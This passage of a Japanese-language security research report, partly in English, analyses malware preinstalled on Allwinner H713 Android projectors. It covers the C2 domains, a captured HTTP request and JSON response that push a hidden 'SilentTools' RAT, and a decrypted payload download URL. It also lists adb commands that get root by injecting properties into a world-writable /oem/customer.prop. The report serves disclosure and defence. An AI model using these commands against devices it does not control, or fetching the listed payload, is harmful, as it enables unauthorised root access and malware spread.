
中国のビーマーによるC2ネットワークの分析 - SilentSDK-Analysis
技術分析レポート — セキュリティ研究
影響を受けるデバイス: Nonete(例:モデルHY260Pro)などのビーマーブランドの複数のAndroidプロジェクター(Magcubic、Hotack、Huyukangなど多くのメーカーが同様のモデルを販売しており、これを裏付ける兆候があるため、これらのプロジェクターも影響を受ける可能性が高い)
チップセットプラットフォーム: Allwinner H713 / sun50iw12p1 — このプラットフォーム上のすべてのデバイスに影響を与える可能性がある
分析期間: 2026年4月11日~17日
分類: プリインストールされたコマンド&コントロールインフラとリモートアクセストロイのペイロード
api.pixelpioneerss.com)へのC2接続を確立し、機密性の高いデバイスIDを抽出し、任意の追加悪意コードをルート権限でいつでもダウンロードして実行できる(chmod 777)。さらに、デバイスにはオープンなルートバックドアが存在する。*.aodintech.com、api.pixelpioneerss.com、sta.smartinnovate.net)をネットワークレベルでブロックする必要がある。影響を受けるユーザーは、悪意のあるアプリがシステムに深く埋め込まれているため、ADBを介して手動で無効化することしかできない。本レポートで文書化されたマルウェアインフラは、現在Amazon、eBay、AliExpressでエンドユーザーに大量販売されているAndroidプロジェクターにプリインストールされている。影響を受けるデバイスは、複数のブランド名(Hotack、Huyukang、Magcubic、Noneteなど)に及ぶ可能性がある。同一のC2インフラは、同一メーカーの他のデバイスでも独立して確認されている(セクション13参照)。 このパターンはBADBOX事例と一致する。
購入したデバイス: Amazonリンク - Nonete Mini Beamer 4K 1080P
| プロパティ | 値 |
|---|---|
| ブランド名 | Nonete HY260Pro(複数の企業が販売するモデル) |
| 内部モデル名 | NT10 |
| SoC | Allwinner sun50iw12p1(ARM 32ビット) |
| オペレーティングシステム | SpectraOS(Android 11、カーネル5.4.99) |
| 実際のビルドフィンガープリント | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| スプーフィングされたビルドフィンガープリント | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive(強制なし) |
| プラットフォーム署名キー | 公開AOSPテストキー |
| OEM証明書 | CN=蓝鲨、OU=www.bsh.me、C=CN |
| ファームウェアチャンネル | HY260Pro_SpectraOS_TPYB |
範囲に関する注意: Allwinner H713チップセットは、欧州市場でブランド名を変えながら販売されている多数の安価なAndroidプロジェクターに組み込まれている。同一のファームウェアベース(h713_tuna_p3)と同一のC2オペレーター(Shenzhen Aodin Technology)は、このOEMの全デバイスが同一のインフラを含んでいることを強く示唆している。
| ステップ | アクション | 結果 |
|---|---|---|
| 1 | Wiresharkによるネットワークトラフィックのキャプチャ | store-api.aodintech.comへのHTTPトラフィック |
| 2 | gzip圧縮されたC2応答のデコード | 7個のアプリ(隠しアプリ「SilentTools」を含む) |
| 3 | AES-CBCによるダウンロードパスの復号 | 鍵 [REDACTED]、.bppファイルへのURL |
| 4 | /oem/customer.prop によるルートエクスプロイト | プロパティ注入後 uid=0(root) |
| 5 | /data、/oem、/system のフォレンジックダンプ | APK、データベース、設定 |
| 6 | StoreOS DEXの静的解析 | pm install -r -d、バイトリバーサル保護 |
| 7 | reverseLenメカニズムのリバースエンジニアリング | アンチ解析保護の理解 |
| 8 | バイトリバーサル保護の突破 | 復号され解析可能なSilentSDK DEX |
| 9 | SilentSDK文字列のXOR復号 | C2ドメイン api.pixelpioneerss.com 確認 |
| 10 | 3つのソースにわたるハッシュ検証 | MD5/SHA-256が完全一致 |
| 11 | マルウェアダウンロードプロセスのリバースエンジニアリング | サーバーはまだオンライン |
| 12 | マルウェアのリバースエンジニアリング | プラグインベースのRATフレームワーク |
ルートアクセスは3つの脆弱性の組み合わせによって達成された:
/oem — パーティションはFATとしてfmask=0000でマウントされている。customer.prop — システムプロパティを上書きする。```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**影響:** 物理的なアクセスを持つユーザー、または同一ネットワーク上の攻撃者(ADB経由、ポート5555が開いていて認証なし)が完全なルートアクセスを取得します。
---
## 4. C2サーバー応答 — 主要な証拠
### キャプチャされたHTTPリクエスト```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
gzip圧縮された応答には、7つのアプリを含むJSONリストが含まれています。そのうち6つは通常のストリーミングアプリ(YouTube、Netflix、Disney+、Prime Video、Chrome、BrowseHere)です。7つ目はSilentToolsです。
| アプリ | パッケージ | 表示 | 強制 | サイレントインストール | サイレントアンインストール | 起動タイプ |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |
{ "name": "SilentTools", "pkg": "com.hotack.silentsdk", "desc": "Special app", "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png", "category": "htc", "zone": "Global", "developer": "htc", "isForce": true, "verCode": 4, "verName": "2509041614", "verDesc": "SilentSDK", "installType": 0, "appType": "apk", "reverseLen": 63995, "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==", "size": 2474873, "md5": "5df097591d6942bae4eff33a37c4e28f", "upDate": "2025-09-04", "isShow": false, "isSilentInstall": false, "isSilentUninstall": true, "isBootStartup": false, "launchType": 1, "launchParam": "com.hotack.silentsdk.MyService" }
**Interpretation of the flags:**
- `isShow: false` — The app does not appear in the store interface.
- `isForce: true` — Presumably forces the action (installation or update).
- `isSilentUninstall: true` — Can uninstall itself without user interaction.
- `launchType: 1` — Automatically starts the background service.
- `launchParam: MyService` — Reference to the persistent service.
- `zone: "Global"` — Targets all devices worldwide.
- `reverseLen` — Byte length needed to restore the SilentSDK `.apk`.
### Encrypted Download Path
The `path` field is AES-CBC encrypted:
- **Key/IV:** `[REDACTED]` (AES-CBC, Raw) -> The ChannelID of the device.
- **Decrypted result:**```text
http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp
注: ここではファイル拡張子.bppがファイアウォールを回避するために使用され、実行時に.apkにリネームされる可能性があります。このキャプチャではisSilentInstallフィールドはfalseです。isForce: trueの正確な意味は、デコンパイルされたコードから明確に復元できませんでした。この値がサーバーサイドで動的にtrueに設定される可能性は否定できません。
このデバイスには、4つの連携するシステムアプリが含まれており、すべてAOSPテストキーで署名され、UID 1000(System)で実行されています。```text ┌──────────────┐ │ DEVICE BOOT │ └──────┬───────┘ ┌────────────────┼────────────────┐ ▼ ▼ ▼ ┌─────────────┐ ┌─────────────┐ ┌──────────────┐ │ StoreOS │ │ SilentSDK │ │ EventUpload │ │ DROPPER │ │ RAT │ │ HEARTBEAT │ └──────┬──────┘ └──────┬──────┘ └──────┬───────┘ ▼ ▼ ▼ store-api. api.pixel event-api. aodintech.com pioneerss.com aodintech.com
+ ExpandSDK (Ad-Injection)
→ pb-api.aodintech.com
---
## 6. StoreOS — ドロッパー分析